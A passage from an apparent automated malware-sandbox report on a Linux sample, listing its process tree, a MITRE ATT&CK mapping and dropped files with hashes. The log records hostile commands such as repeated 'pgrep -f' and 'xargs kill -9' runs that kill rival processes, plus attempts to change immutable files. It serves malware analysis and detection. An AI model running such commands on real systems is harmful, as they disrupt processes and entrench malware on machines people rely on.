  pgrep -f xzpauectgr
  2⤵
  - Reads runtime system information
  PID:2530
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2533
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:2532
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2535
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:2534
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2537
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  PID:2536
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2539
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  - Reads CPU attributes
  PID:2538

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Sudo and Sudo Caching

T1548.003

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Adversary-in-the-Middle

T1557

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Adversary-in-the-Middle

T1557

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/kdevtmpfsi

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/usr/bin/tntrecht

Filesize
14KB

MD5
726a7b7afb4b78ea6702e4b9f7128723

SHA1
c836f6e3ac628023880394ab1028712c275f41a8

SHA256
8a9588a23487c1f61ae5fd032bc8f83f11d9781b206d2d7d230b29705bb84eb2

SHA512
fde0fcd807c0645a7ad9a3f49d945b67c897c54c4d3b6072d1a1d0d12d5c906b3d1a7ebc324ee7716d5c65e03b8cbf3698b229de4c3b57b91fdab07eba2ee9ea

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads